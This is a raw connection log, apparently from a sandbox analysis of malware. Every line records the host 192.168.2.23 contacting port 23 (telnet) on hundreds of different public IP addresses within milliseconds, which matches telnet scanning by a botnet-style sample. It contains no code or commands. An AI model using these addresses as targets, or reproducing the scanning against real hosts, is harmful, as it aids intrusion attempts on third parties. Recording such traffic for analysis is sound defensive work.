                                                Dec 3, 2024 22:16:50.549223900 CET3796323192.168.2.2389.105.219.243
                                                Dec 3, 2024 22:16:50.549232006 CET3796323192.168.2.2338.91.26.156
                                                Dec 3, 2024 22:16:50.549232006 CET3796323192.168.2.2392.220.124.221
                                                Dec 3, 2024 22:16:50.549232960 CET3796323192.168.2.2323.206.12.43
                                                Dec 3, 2024 22:16:50.549237013 CET3796323192.168.2.23133.115.96.253
                                                Dec 3, 2024 22:16:50.549237013 CET3796323192.168.2.23204.138.152.126
                                                Dec 3, 2024 22:16:50.549237013 CET3796323192.168.2.2380.163.138.181
                                                Dec 3, 2024 22:16:50.549242973 CET3796323192.168.2.23150.197.178.234
                                                Dec 3, 2024 22:16:50.549242973 CET3796323192.168.2.23194.47.107.254
                                                Dec 3, 2024 22:16:50.549242973 CET3796323192.168.2.2332.154.92.59
                                                Dec 3, 2024 22:16:50.549248934 CET3796323192.168.2.23162.183.62.151
                                                Dec 3, 2024 22:16:50.549261093 CET3796323192.168.2.23182.10.70.63
                                                Dec 3, 2024 22:16:50.549261093 CET3796323192.168.2.2362.250.219.230
                                                Dec 3, 2024 22:16:50.549262047 CET3796323192.168.2.23212.10.70.126
                                                Dec 3, 2024 22:16:50.549269915 CET3796323192.168.2.23135.97.95.94
                                                Dec 3, 2024 22:16:50.549273968 CET3796323192.168.2.23191.240.96.145
                                                Dec 3, 2024 22:16:50.549277067 CET3796323192.168.2.23206.110.226.238
                                                Dec 3, 2024 22:16:50.549283981 CET3796323192.168.2.2381.23.162.184
                                                Dec 3, 2024 22:16:50.549293041 CET3796323192.168.2.23220.140.41.2
                                                Dec 3, 2024 22:16:50.549293041 CET3796323192.168.2.23107.160.145.175
                                                Dec 3, 2024 22:16:50.549295902 CET3796323192.168.2.2332.83.253.105
                                                Dec 3, 2024 22:16:50.549305916 CET3796323192.168.2.23169.47.133.131
                                                Dec 3, 2024 22:16:50.549313068 CET3796323192.168.2.2346.193.190.157
                                                Dec 3, 2024 22:16:50.549314976 CET3796323192.168.2.23165.241.63.196
                                                Dec 3, 2024 22:16:50.549314976 CET3796323192.168.2.23210.38.184.2
                                                Dec 3, 2024 22:16:50.549314976 CET3796323192.168.2.23220.75.73.63
                                                Dec 3, 2024 22:16:50.549318075 CET3796323192.168.2.23189.254.95.238
                                                Dec 3, 2024 22:16:50.549319983 CET3796323192.168.2.2379.182.29.60
                                                Dec 3, 2024 22:16:50.549319983 CET3796323192.168.2.23124.252.29.114
                                                Dec 3, 2024 22:16:50.549319983 CET3796323192.168.2.23149.165.226.240
                                                Dec 3, 2024 22:16:50.549329042 CET3796323192.168.2.2384.231.23.249
                                                Dec 3, 2024 22:16:50.549329042 CET3796323192.168.2.23176.210.250.113
                                                Dec 3, 2024 22:16:50.549329996 CET3796323192.168.2.2399.129.78.243
                                                Dec 3, 2024 22:16:50.549334049 CET3796323192.168.2.2386.60.228.219
                                                Dec 3, 2024 22:16:50.549334049 CET3796323192.168.2.2323.97.106.22
                                                Dec 3, 2024 22:16:50.549335957 CET3796323192.168.2.23212.151.154.239
                                                Dec 3, 2024 22:16:50.549335957 CET3796323192.168.2.23223.201.203.1
                                                Dec 3, 2024 22:16:50.549336910 CET3796323192.168.2.23182.31.169.135
                                                Dec 3, 2024 22:16:50.549336910 CET3796323192.168.2.23218.225.40.123
                                                Dec 3, 2024 22:16:50.549338102 CET3796323192.168.2.2371.228.214.32
                                                Dec 3, 2024 22:16:50.549338102 CET3796323192.168.2.23143.37.63.253
                                                Dec 3, 2024 22:16:50.549340010 CET3796323192.168.2.23190.119.164.99
                                                Dec 3, 2024 22:16:50.549340010 CET3796323192.168.2.23182.218.221.237
                                                Dec 3, 2024 22:16:50.549340010 CET3796323192.168.2.2338.86.94.194
                                                Dec 3, 2024 22:16:50.549343109 CET3796323192.168.2.2378.189.82.15
                                                Dec 3, 2024 22:16:50.549355984 CET3796323192.168.2.23148.107.59.78
                                                Dec 3, 2024 22:16:50.549359083 CET3796323192.168.2.23180.180.164.90
                                                Dec 3, 2024 22:16:50.549359083 CET3796323192.168.2.23181.57.89.156
                                                Dec 3, 2024 22:16:50.549360037 CET3796323192.168.2.2386.8.126.5
                                                Dec 3, 2024 22:16:50.549360037 CET3796323192.168.2.23169.65.244.138
                                                Dec 3, 2024 22:16:50.549360037 CET3796323192.168.2.23163.112.191.22
                                                Dec 3, 2024 22:16:50.549360991 CET3796323192.168.2.2362.90.191.235
                                                Dec 3, 2024 22:16:50.549361944 CET3796323192.168.2.23216.68.78.100
                                                Dec 3, 2024 22:16:50.549360991 CET3796323192.168.2.23113.55.42.162
                                                Dec 3, 2024 22:16:50.549361944 CET3796323192.168.2.23128.255.57.150
                                                Dec 3, 2024 22:16:50.549360991 CET3796323192.168.2.2387.172.136.243
                                                Dec 3, 2024 22:16:50.549361944 CET3796323192.168.2.23165.171.37.194
                                                Dec 3, 2024 22:16:50.549371004 CET3796323192.168.2.23188.174.23.198
                                                Dec 3, 2024 22:16:50.549371004 CET3796323192.168.2.23162.31.86.116
                                                Dec 3, 2024 22:16:50.549371004 CET3796323192.168.2.23209.16.98.107
                                                Dec 3, 2024 22:16:50.549371004 CET3796323192.168.2.23172.115.197.150
                                                Dec 3, 2024 22:16:50.549371004 CET3796323192.168.2.23219.195.50.176
                                                Dec 3, 2024 22:16:50.549376965 CET3796323192.168.2.23101.22.221.81
                                                Dec 3, 2024 22:16:50.549376965 CET3796323192.168.2.23205.5.250.14
                                                Dec 3, 2024 22:16:50.549376965 CET3796323192.168.2.23187.62.44.207
                                                Dec 3, 2024 22:16:50.549381971 CET3796323192.168.2.23182.103.236.17
                                                Dec 3, 2024 22:16:50.549382925 CET3796323192.168.2.2395.96.30.179
                                                Dec 3, 2024 22:16:50.549386024 CET3796323192.168.2.23131.12.203.195
                                                Dec 3, 2024 22:16:50.549386024 CET3796323192.168.2.2334.195.7.48
                                                Dec 3, 2024 22:16:50.549387932 CET3796323192.168.2.23156.187.191.221
                                                Dec 3, 2024 22:16:50.549397945 CET3796323192.168.2.23193.76.233.135
                                                Dec 3, 2024 22:16:50.549397945 CET3796323192.168.2.23149.136.154.32
                                                Dec 3, 2024 22:16:50.549397945 CET3796323192.168.2.23147.23.141.102
                                                Dec 3, 2024 22:16:50.549398899 CET3796323192.168.2.23188.240.84.170
                                                Dec 3, 2024 22:16:50.549400091 CET3796323192.168.2.23196.114.238.132
                                                Dec 3, 2024 22:16:50.549403906 CET3796323192.168.2.2369.97.236.85
                                                Dec 3, 2024 22:16:50.549403906 CET3796323192.168.2.2319.30.17.3
                                                Dec 3, 2024 22:16:50.549403906 CET3796323192.168.2.2372.97.74.39
                                                Dec 3, 2024 22:16:50.549403906 CET3796323192.168.2.2373.249.169.233
                                                Dec 3, 2024 22:16:50.549413919 CET3796323192.168.2.23126.200.104.44
                                                Dec 3, 2024 22:16:50.549416065 CET3796323192.168.2.2389.175.233.30
                                                Dec 3, 2024 22:16:50.549416065 CET3796323192.168.2.2397.188.68.192
                                                Dec 3, 2024 22:16:50.549417019 CET3796323192.168.2.2345.166.218.4
                                                Dec 3, 2024 22:16:50.549417019 CET3796323192.168.2.2369.113.110.201
                                                Dec 3, 2024 22:16:50.549417019 CET3796323192.168.2.2393.201.207.9
                                                Dec 3, 2024 22:16:50.549417973 CET3796323192.168.2.23184.3.32.211
                                                Dec 3, 2024 22:16:50.549417973 CET3796323192.168.2.23168.120.58.10
                                                Dec 3, 2024 22:16:50.549438953 CET3796323192.168.2.23203.208.154.207
                                                Dec 3, 2024 22:16:50.549438953 CET3796323192.168.2.2399.244.134.93
                                                Dec 3, 2024 22:16:50.549438953 CET3796323192.168.2.23130.177.102.249
                                                Dec 3, 2024 22:16:50.549438953 CET3796323192.168.2.23128.191.103.174
                                                Dec 3, 2024 22:16:50.549438953 CET3796323192.168.2.23204.183.139.12
                                                Dec 3, 2024 22:16:50.549441099 CET3796323192.168.2.23126.50.136.155
                                                Dec 3, 2024 22:16:50.549442053 CET3796323192.168.2.232.142.231.33
                                                Dec 3, 2024 22:16:50.549438953 CET3796323192.168.2.23132.58.193.221
                                                Dec 3, 2024 22:16:50.549438953 CET3796323192.168.2.2340.223.104.116
                                                Dec 3, 2024 22:16:50.549439907 CET3796323192.168.2.23191.61.172.20
                                                Dec 3, 2024 22:16:50.549438953 CET3796323192.168.2.23128.0.69.234
                                                Dec 3, 2024 22:16:50.549439907 CET3796323192.168.2.23168.223.203.110
                                                Dec 3, 2024 22:16:50.549442053 CET3796323192.168.2.2376.5.91.144
                                                Dec 3, 2024 22:16:50.549442053 CET3796323192.168.2.2383.120.224.44
                                                Dec 3, 2024 22:16:50.549454927 CET3796323192.168.2.2381.119.8.24
                                                Dec 3, 2024 22:16:50.549454927 CET3796323192.168.2.23147.219.202.138
                                                Dec 3, 2024 22:16:50.549454927 CET3796323192.168.2.23210.17.111.21
                                                Dec 3, 2024 22:16:50.549457073 CET3796323192.168.2.23175.223.129.243
                                                Dec 3, 2024 22:16:50.549457073 CET3796323192.168.2.23114.168.228.88
                                                Dec 3, 2024 22:16:50.549458027 CET3796323192.168.2.2397.113.250.173
                                                Dec 3, 2024 22:16:50.549460888 CET3796323192.168.2.2358.191.254.174
                                                Dec 3, 2024 22:16:50.549460888 CET3796323192.168.2.23136.118.114.31
                                                Dec 3, 2024 22:16:50.549460888 CET3796323192.168.2.2317.87.37.65
                                                Dec 3, 2024 22:16:50.549460888 CET3796323192.168.2.23125.4.69.255
                                                Dec 3, 2024 22:16:50.549460888 CET3796323192.168.2.23150.147.175.80
                                                Dec 3, 2024 22:16:50.549460888 CET3796323192.168.2.23222.193.249.158
                                                Dec 3, 2024 22:16:50.549460888 CET3796323192.168.2.2390.195.24.195
                                                Dec 3, 2024 22:16:50.549460888 CET3796323192.168.2.23154.65.110.18
                                                Dec 3, 2024 22:16:50.549488068 CET3796323192.168.2.23191.131.116.20
                                                Dec 3, 2024 22:16:50.549488068 CET3796323192.168.2.2338.224.232.126
                                                Dec 3, 2024 22:16:50.549489975 CET3796323192.168.2.2380.164.67.58
                                                Dec 3, 2024 22:16:50.549489975 CET3796323192.168.2.23135.127.81.228
                                                Dec 3, 2024 22:16:50.549489975 CET3796323192.168.2.23156.215.239.252
                                                Dec 3, 2024 22:16:50.549489975 CET3796323192.168.2.23218.4.11.84
                                                Dec 3, 2024 22:16:50.549489975 CET3796323192.168.2.2324.35.80.246
                                                Dec 3, 2024 22:16:50.549489975 CET3796323192.168.2.2381.250.71.129
                                                Dec 3, 2024 22:16:50.549489975 CET3796323192.168.2.2361.17.179.26
                                                Dec 3, 2024 22:16:50.549491882 CET3796323192.168.2.23152.138.38.158
                                                Dec 3, 2024 22:16:50.549491882 CET3796323192.168.2.2396.88.98.120
                                                Dec 3, 2024 22:16:50.549493074 CET3796323192.168.2.23223.110.70.250
                                                Dec 3, 2024 22:16:50.549493074 CET3796323192.168.2.23142.154.92.176
                                                Dec 3, 2024 22:16:50.549493074 CET3796323192.168.2.2394.88.225.163
                                                Dec 3, 2024 22:16:50.549494028 CET3796323192.168.2.2370.9.34.105
                                                Dec 3, 2024 22:16:50.549493074 CET3796323192.168.2.2323.210.76.201
                                                Dec 3, 2024 22:16:50.549494028 CET3796323192.168.2.23172.94.57.171
                                                Dec 3, 2024 22:16:50.549493074 CET3796323192.168.2.23145.244.240.189
                                                Dec 3, 2024 22:16:50.549494028 CET3796323192.168.2.23154.182.253.175
                                                Dec 3, 2024 22:16:50.549493074 CET3796323192.168.2.23121.192.199.20
                                                Dec 3, 2024 22:16:50.549494028 CET3796323192.168.2.2334.6.13.122
                                                Dec 3, 2024 22:16:50.549506903 CET3796323192.168.2.2378.87.251.239
                                                Dec 3, 2024 22:16:50.549506903 CET3796323192.168.2.23185.127.126.174
                                                Dec 3, 2024 22:16:50.549506903 CET3796323192.168.2.23130.171.197.16
                                                Dec 3, 2024 22:16:50.549506903 CET3796323192.168.2.2360.30.145.143
                                                Dec 3, 2024 22:16:50.549506903 CET3796323192.168.2.23148.13.232.137
                                                Dec 3, 2024 22:16:50.549516916 CET3796323192.168.2.23133.203.61.192
                                                Dec 3, 2024 22:16:50.549520016 CET3796323192.168.2.23208.201.138.212
                                                Dec 3, 2024 22:16:50.549520016 CET3796323192.168.2.23200.113.226.75
                                                Dec 3, 2024 22:16:50.549520016 CET3796323192.168.2.2372.130.7.186
                                                Dec 3, 2024 22:16:50.549520969 CET3796323192.168.2.2382.100.123.181
                                                Dec 3, 2024 22:16:50.549520016 CET3796323192.168.2.23178.213.191.140
                                                Dec 3, 2024 22:16:50.549520016 CET3796323192.168.2.2341.57.85.12
                                                Dec 3, 2024 22:16:50.549520016 CET3796323192.168.2.23140.234.146.68
                                                Dec 3, 2024 22:16:50.549523115 CET3796323192.168.2.23175.239.241.34
                                                Dec 3, 2024 22:16:50.549520016 CET3796323192.168.2.23105.239.171.173
                                                Dec 3, 2024 22:16:50.549520016 CET3796323192.168.2.23126.78.158.57
                                                Dec 3, 2024 22:16:50.549520016 CET3796323192.168.2.23148.122.86.185
                                                Dec 3, 2024 22:16:50.549529076 CET3796323192.168.2.23175.64.14.213
                                                Dec 3, 2024 22:16:50.549530029 CET3796323192.168.2.23199.191.245.84
                                                Dec 3, 2024 22:16:50.549530029 CET3796323192.168.2.232.49.148.193
                                                Dec 3, 2024 22:16:50.549530029 CET3796323192.168.2.2375.39.176.250
                                                Dec 3, 2024 22:16:50.549530029 CET3796323192.168.2.23181.7.234.203
                                                Dec 3, 2024 22:16:50.549566031 CET3796323192.168.2.2352.0.44.152
                                                Dec 3, 2024 22:16:50.549566031 CET3796323192.168.2.23204.9.105.159
                                                Dec 3, 2024 22:16:50.549566031 CET3796323192.168.2.23126.205.21.60
                                                Dec 3, 2024 22:16:50.549566031 CET3796323192.168.2.23175.4.146.255
                                                Dec 3, 2024 22:16:50.549566031 CET3796323192.168.2.23203.211.74.67
                                                Dec 3, 2024 22:16:50.549568892 CET3796323192.168.2.232.27.252.112
                                                Dec 3, 2024 22:16:50.549568892 CET3796323192.168.2.2377.12.27.161
                                                Dec 3, 2024 22:16:50.549568892 CET3796323192.168.2.23156.181.142.63
                                                Dec 3, 2024 22:16:50.549568892 CET3796323192.168.2.23158.156.104.71
                                                Dec 3, 2024 22:16:50.549571037 CET3796323192.168.2.2377.96.97.16
                                                Dec 3, 2024 22:16:50.549571037 CET3796323192.168.2.2331.152.77.12
                                                Dec 3, 2024 22:16:50.549570084 CET3796323192.168.2.2392.72.202.77
                                                Dec 3, 2024 22:16:50.549571991 CET3796323192.168.2.23176.248.170.96
                                                Dec 3, 2024 22:16:50.549571037 CET3796323192.168.2.2338.1.19.19
                                                Dec 3, 2024 22:16:50.549570084 CET3796323192.168.2.23154.125.18.17
                                                Dec 3, 2024 22:16:50.549571037 CET3796323192.168.2.23177.59.214.53
                                                Dec 3, 2024 22:16:50.549571037 CET3796323192.168.2.2320.203.9.120
                                                Dec 3, 2024 22:16:50.549571037 CET3796323192.168.2.232.209.157.224
                                                Dec 3, 2024 22:16:50.549571037 CET3796323192.168.2.2373.42.97.62
                                                Dec 3, 2024 22:16:50.549571037 CET3796323192.168.2.23146.219.242.140
                                                Dec 3, 2024 22:16:50.549570084 CET3796323192.168.2.2395.43.91.155
                                                Dec 3, 2024 22:16:50.549568892 CET3796323192.168.2.23173.247.23.72
                                                Dec 3, 2024 22:16:50.549571037 CET3796323192.168.2.23110.136.5.201
                                                Dec 3, 2024 22:16:50.549571037 CET3796323192.168.2.23102.193.238.113
                                                Dec 3, 2024 22:16:50.549570084 CET3796323192.168.2.23183.92.86.232
                                                Dec 3, 2024 22:16:50.549568892 CET3796323192.168.2.23181.54.62.86
                                                Dec 3, 2024 22:16:50.549570084 CET3796323192.168.2.23102.183.103.91
                                                Dec 3, 2024 22:16:50.549571037 CET3796323192.168.2.2343.135.184.116
                                                Dec 3, 2024 22:16:50.549571037 CET3796323192.168.2.2367.174.116.250
                                                Dec 3, 2024 22:16:50.549571037 CET3796323192.168.2.23116.154.28.24
                                                Dec 3, 2024 22:16:50.549571037 CET3796323192.168.2.2339.222.2.189
                                                Dec 3, 2024 22:16:50.549571037 CET3796323192.168.2.23122.98.14.174
                                                Dec 3, 2024 22:16:50.549571037 CET3796323192.168.2.23157.170.105.34
                                                Dec 3, 2024 22:16:50.549571037 CET3796323192.168.2.23177.227.77.134
                                                Dec 3, 2024 22:16:50.549616098 CET3796323192.168.2.23170.212.88.98
                                                Dec 3, 2024 22:16:50.549618006 CET3796323192.168.2.23201.102.114.48
                                                Dec 3, 2024 22:16:50.549617052 CET3796323192.168.2.2385.227.82.89
                                                Dec 3, 2024 22:16:50.549616098 CET3796323192.168.2.23217.208.220.231
                                                Dec 3, 2024 22:16:50.549617052 CET3796323192.168.2.23166.147.152.91
                                                Dec 3, 2024 22:16:50.549617052 CET3796323192.168.2.2344.225.122.156
                                                Dec 3, 2024 22:16:50.549617052 CET3796323192.168.2.23170.146.255.133
                                                Dec 3, 2024 22:16:50.549617052 CET3796323192.168.2.23116.154.187.135
                                                Dec 3, 2024 22:16:50.549619913 CET3796323192.168.2.2391.222.6.234
                                                Dec 3, 2024 22:16:50.549619913 CET3796323192.168.2.2379.105.47.30
                                                Dec 3, 2024 22:16:50.549619913 CET3796323192.168.2.23195.251.89.224
                                                Dec 3, 2024 22:16:50.549619913 CET3796323192.168.2.2332.203.119.224
                                                Dec 3, 2024 22:16:50.549619913 CET3796323192.168.2.23126.241.72.9
                                                Dec 3, 2024 22:16:50.549619913 CET3796323192.168.2.2314.86.184.171
                                                Dec 3, 2024 22:16:50.549619913 CET3796323192.168.2.23177.33.189.184
                                                Dec 3, 2024 22:16:50.549619913 CET3796323192.168.2.23193.180.190.218
                                                Dec 3, 2024 22:16:50.549619913 CET3796323192.168.2.2357.59.246.38
                                                Dec 3, 2024 22:16:50.549619913 CET3796323192.168.2.23120.9.194.136
                                                Dec 3, 2024 22:16:50.549627066 CET3796323192.168.2.234.221.223.104
                                                Dec 3, 2024 22:16:50.549627066 CET3796323192.168.2.2335.46.239.234
                                                Dec 3, 2024 22:16:50.549627066 CET3796323192.168.2.23110.206.33.214
                                                Dec 3, 2024 22:16:50.549627066 CET3796323192.168.2.239.97.48.37
                                                Dec 3, 2024 22:16:50.549627066 CET3796323192.168.2.2313.231.96.213
                                                Dec 3, 2024 22:16:50.549627066 CET3796323192.168.2.23136.5.75.73
                                                Dec 3, 2024 22:16:50.549627066 CET3796323192.168.2.23111.13.81.175
                                                Dec 3, 2024 22:16:50.549627066 CET3796323192.168.2.23191.253.16.223
                                                Dec 3, 2024 22:16:50.549627066 CET3796323192.168.2.23165.185.219.95
                                                Dec 3, 2024 22:16:50.549627066 CET3796323192.168.2.2336.218.142.243
                                                Dec 3, 2024 22:16:50.549627066 CET3796323192.168.2.2391.140.56.3
                                                Dec 3, 2024 22:16:50.549627066 CET3796323192.168.2.23209.88.75.45
                                                Dec 3, 2024 22:16:50.549627066 CET3796323192.168.2.2312.83.113.46
                                                Dec 3, 2024 22:16:50.549627066 CET3796323192.168.2.23111.223.206.10
                                                Dec 3, 2024 22:16:50.549627066 CET3796323192.168.2.23144.224.130.175
                                                Dec 3, 2024 22:16:50.549627066 CET3796323192.168.2.2386.35.142.212
                                                Dec 3, 2024 22:16:50.549627066 CET3796323192.168.2.23125.141.182.138
                                                Dec 3, 2024 22:16:50.549627066 CET3796323192.168.2.2381.162.128.224
                                                Dec 3, 2024 22:16:50.549627066 CET3796323192.168.2.23109.50.72.161
                                                Dec 3, 2024 22:16:50.549628019 CET3796323192.168.2.2337.141.98.150
                                                Dec 3, 2024 22:16:50.549649000 CET3796323192.168.2.2399.172.154.245
                                                Dec 3, 2024 22:16:50.549649000 CET3796323192.168.2.23146.138.141.220
                                                Dec 3, 2024 22:16:50.549649000 CET3796323192.168.2.23152.90.102.192
                                                Dec 3, 2024 22:16:50.549649000 CET3796323192.168.2.23111.118.142.195
                                                Dec 3, 2024 22:16:50.549649000 CET3796323192.168.2.2384.193.242.221
                                                Dec 3, 2024 22:16:50.549649000 CET3796323192.168.2.2378.117.49.152
                                                Dec 3, 2024 22:16:50.549649000 CET3796323192.168.2.23191.107.243.3
                                                Dec 3, 2024 22:16:50.549649000 CET3796323192.168.2.23216.95.62.51
                                                Dec 3, 2024 22:16:50.549654007 CET3796323192.168.2.23118.168.11.123
                                                Dec 3, 2024 22:16:50.549658060 CET3796323192.168.2.23200.113.52.183
                                                Dec 3, 2024 22:16:50.549658060 CET3796323192.168.2.23158.193.35.194
                                                Dec 3, 2024 22:16:50.549658060 CET3796323192.168.2.23158.245.61.244
                                                Dec 3, 2024 22:16:50.549658060 CET3796323192.168.2.23207.111.99.240
                                                Dec 3, 2024 22:16:50.549666882 CET3796323192.168.2.23198.205.62.66
                                                Dec 3, 2024 22:16:50.549666882 CET3796323192.168.2.2352.173.45.132
                                                Dec 3, 2024 22:16:50.549666882 CET3796323192.168.2.2347.82.84.201
                                                Dec 3, 2024 22:16:50.549666882 CET3796323192.168.2.23131.32.209.48
                                                Dec 3, 2024 22:16:50.549668074 CET3796323192.168.2.23202.211.228.16
                                                Dec 3, 2024 22:16:50.549669027 CET3796323192.168.2.2381.182.95.108
                                                Dec 3, 2024 22:16:50.549669981 CET3796323192.168.2.23137.188.87.124
                                                Dec 3, 2024 22:16:50.549666882 CET3796323192.168.2.2390.240.142.203
                                                Dec 3, 2024 22:16:50.549666882 CET3796323192.168.2.2374.76.14.119
                                                Dec 3, 2024 22:16:50.549669027 CET3796323192.168.2.2382.75.164.151
                                                Dec 3, 2024 22:16:50.549666882 CET3796323192.168.2.2396.137.195.73
                                                Dec 3, 2024 22:16:50.549669981 CET3796323192.168.2.2359.76.205.227
                                                Dec 3, 2024 22:16:50.549669027 CET3796323192.168.2.23157.197.23.10
                                                Dec 3, 2024 22:16:50.549666882 CET3796323192.168.2.2399.214.202.6
                                                Dec 3, 2024 22:16:50.549669981 CET3796323192.168.2.23106.112.111.236
                                                Dec 3, 2024 22:16:50.549669027 CET3796323192.168.2.23163.233.159.228
                                                Dec 3, 2024 22:16:50.549670935 CET3796323192.168.2.2362.39.17.4
                                                Dec 3, 2024 22:16:50.549669027 CET3796323192.168.2.23174.233.239.145
                                                Dec 3, 2024 22:16:50.549670935 CET3796323192.168.2.2377.66.182.27
                                                Dec 3, 2024 22:16:50.549666882 CET3796323192.168.2.2359.5.43.194
                                                Dec 3, 2024 22:16:50.549670935 CET3796323192.168.2.23209.61.29.122
                                                Dec 3, 2024 22:16:50.549666882 CET3796323192.168.2.23216.117.175.163
                                                Dec 3, 2024 22:16:50.549670935 CET3796323192.168.2.2344.42.128.244
                                                Dec 3, 2024 22:16:50.549685001 CET3796323192.168.2.23166.192.55.193
                                                Dec 3, 2024 22:16:50.549685001 CET3796323192.168.2.23201.107.249.216
                                                Dec 3, 2024 22:16:50.549685001 CET3796323192.168.2.23107.187.250.250
                                                Dec 3, 2024 22:16:50.549685001 CET3796323192.168.2.23200.190.48.255
                                                Dec 3, 2024 22:16:50.549685001 CET3796323192.168.2.23147.28.35.35
                                                Dec 3, 2024 22:16:50.549685001 CET3796323192.168.2.2390.72.74.0
                                                Dec 3, 2024 22:16:50.549666882 CET3796323192.168.2.23164.106.15.152
                                                Dec 3, 2024 22:16:50.549670935 CET3796323192.168.2.23207.96.48.51
                                                Dec 3, 2024 22:16:50.549670935 CET3796323192.168.2.2336.153.61.145
                                                Dec 3, 2024 22:16:50.549670935 CET3796323192.168.2.23212.38.211.44
                                                Dec 3, 2024 22:16:50.549690962 CET3796323192.168.2.2343.210.254.37
                                                Dec 3, 2024 22:16:50.549690962 CET3796323192.168.2.2384.156.49.220
                                                Dec 3, 2024 22:16:50.549695969 CET3796323192.168.2.2381.191.242.97
                                                Dec 3, 2024 22:16:50.549695969 CET3796323192.168.2.2352.47.101.131
                                                Dec 3, 2024 22:16:50.549698114 CET3796323192.168.2.23160.54.172.135
                                                Dec 3, 2024 22:16:50.549699068 CET3796323192.168.2.2323.198.78.89
                                                Dec 3, 2024 22:16:50.549699068 CET3796323192.168.2.23168.231.168.146
                                                Dec 3, 2024 22:16:50.549699068 CET3796323192.168.2.23113.61.244.84
                                                Dec 3, 2024 22:16:50.549699068 CET3796323192.168.2.2341.84.234.163
                                                Dec 3, 2024 22:16:50.549699068 CET3796323192.168.2.23180.188.83.184
                                                Dec 3, 2024 22:16:50.549700022 CET3796323192.168.2.23210.189.189.16
                                                Dec 3, 2024 22:16:50.549699068 CET3796323192.168.2.23139.35.114.67
                                                Dec 3, 2024 22:16:50.549700022 CET3796323192.168.2.2388.21.141.69
                                                Dec 3, 2024 22:16:50.549700975 CET3796323192.168.2.23173.86.171.19
                                                Dec 3, 2024 22:16:50.549700975 CET3796323192.168.2.23105.70.72.141
                                                Dec 3, 2024 22:16:50.549700975 CET3796323192.168.2.2337.254.78.36
                                                Dec 3, 2024 22:16:50.549701929 CET3796323192.168.2.23132.76.33.206
                                                Dec 3, 2024 22:16:50.549700975 CET3796323192.168.2.2395.142.104.240
                                                Dec 3, 2024 22:16:50.549701929 CET3796323192.168.2.2325.117.72.238
                                                Dec 3, 2024 22:16:50.549699068 CET3796323192.168.2.2313.248.191.166
                                                Dec 3, 2024 22:16:50.549701929 CET3796323192.168.2.23160.99.246.143
                                                Dec 3, 2024 22:16:50.549701929 CET3796323192.168.2.23218.51.151.242
                                                Dec 3, 2024 22:16:50.549700975 CET3796323192.168.2.23201.73.99.223
                                                Dec 3, 2024 22:16:50.549700975 CET3796323192.168.2.23124.218.125.83
                                                Dec 3, 2024 22:16:50.549714088 CET3796323192.168.2.2313.27.76.144
                                                Dec 3, 2024 22:16:50.549714088 CET3796323192.168.2.231.230.236.109
                                                Dec 3, 2024 22:16:50.549736977 CET3796323192.168.2.23154.214.147.242
                                                Dec 3, 2024 22:16:50.549736977 CET3796323192.168.2.23130.187.43.91
                                                Dec 3, 2024 22:16:50.549736977 CET3796323192.168.2.2332.79.209.90
                                                Dec 3, 2024 22:16:50.549736977 CET3796323192.168.2.23213.65.240.72
                                                Dec 3, 2024 22:16:50.549736977 CET3796323192.168.2.23162.102.237.96
                                                Dec 3, 2024 22:16:50.549741030 CET3796323192.168.2.2337.215.134.172
                                                Dec 3, 2024 22:16:50.549741030 CET3796323192.168.2.2320.208.25.107
                                                Dec 3, 2024 22:16:50.549741030 CET3796323192.168.2.2344.187.123.195
                                                Dec 3, 2024 22:16:50.549741030 CET3796323192.168.2.23151.200.145.195
                                                Dec 3, 2024 22:16:50.549741030 CET3796323192.168.2.23118.211.240.164
                                                Dec 3, 2024 22:16:50.549741030 CET3796323192.168.2.23131.201.71.45
                                                Dec 3, 2024 22:16:50.549741983 CET3796323192.168.2.23190.210.102.225
                                                Dec 3, 2024 22:16:50.549741030 CET3796323192.168.2.23180.81.64.115
                                                Dec 3, 2024 22:16:50.549741983 CET3796323192.168.2.23182.232.67.221
                                                Dec 3, 2024 22:16:50.549742937 CET3796323192.168.2.23191.95.201.148
                                                Dec 3, 2024 22:16:50.549741983 CET3796323192.168.2.2361.98.152.77
                                                Dec 3, 2024 22:16:50.549743891 CET3796323192.168.2.2394.233.122.123
                                                Dec 3, 2024 22:16:50.549741030 CET3796323192.168.2.23176.130.217.213
                                                Dec 3, 2024 22:16:50.549743891 CET3796323192.168.2.23160.117.239.30
                                                Dec 3, 2024 22:16:50.549742937 CET3796323192.168.2.23115.155.74.164
                                                Dec 3, 2024 22:16:50.549741030 CET3796323192.168.2.2342.168.230.7
                                                Dec 3, 2024 22:16:50.549742937 CET3796323192.168.2.23187.195.237.165
                                                Dec 3, 2024 22:16:50.549743891 CET3796323192.168.2.2344.46.4.154
                                                Dec 3, 2024 22:16:50.549742937 CET3796323192.168.2.23173.217.154.195
                                                Dec 3, 2024 22:16:50.549743891 CET3796323192.168.2.2349.249.17.77
                                                Dec 3, 2024 22:16:50.549743891 CET3796323192.168.2.23188.151.245.103
                                                Dec 3, 2024 22:16:50.549742937 CET3796323192.168.2.23204.5.96.177
                                                Dec 3, 2024 22:16:50.549742937 CET3796323192.168.2.23141.155.241.168
                                                Dec 3, 2024 22:16:50.549741983 CET3796323192.168.2.23199.238.212.58
                                                Dec 3, 2024 22:16:50.549743891 CET3796323192.168.2.23217.9.129.69
                                                Dec 3, 2024 22:16:50.549743891 CET3796323192.168.2.23103.185.96.42
                                                Dec 3, 2024 22:16:50.549743891 CET3796323192.168.2.23131.93.185.76
                                                Dec 3, 2024 22:16:50.549762011 CET3796323192.168.2.23145.171.187.84
                                                Dec 3, 2024 22:16:50.549762011 CET3796323192.168.2.2393.168.77.33
                                                Dec 3, 2024 22:16:50.549762011 CET3796323192.168.2.2383.34.176.87
                                                Dec 3, 2024 22:16:50.549763918 CET3796323192.168.2.2385.120.126.27
                                                Dec 3, 2024 22:16:50.549763918 CET3796323192.168.2.23115.62.123.237
                                                Dec 3, 2024 22:16:50.549763918 CET3796323192.168.2.23139.110.104.228
                                                Dec 3, 2024 22:16:50.549763918 CET3796323192.168.2.23218.49.141.60
                                                Dec 3, 2024 22:16:50.549763918 CET3796323192.168.2.2369.205.189.192
                                                Dec 3, 2024 22:16:50.549763918 CET3796323192.168.2.23192.42.59.195
                                                Dec 3, 2024 22:16:50.549763918 CET3796323192.168.2.23223.138.125.102
                                                Dec 3, 2024 22:16:50.549767971 CET3796323192.168.2.2374.157.25.253
                                                Dec 3, 2024 22:16:50.549763918 CET3796323192.168.2.23139.248.60.203
                                                Dec 3, 2024 22:16:50.549767971 CET3796323192.168.2.23129.76.122.76
                                                Dec 3, 2024 22:16:50.549763918 CET3796323192.168.2.23140.244.188.158
                                                Dec 3, 2024 22:16:50.549768925 CET3796323192.168.2.23123.8.24.108
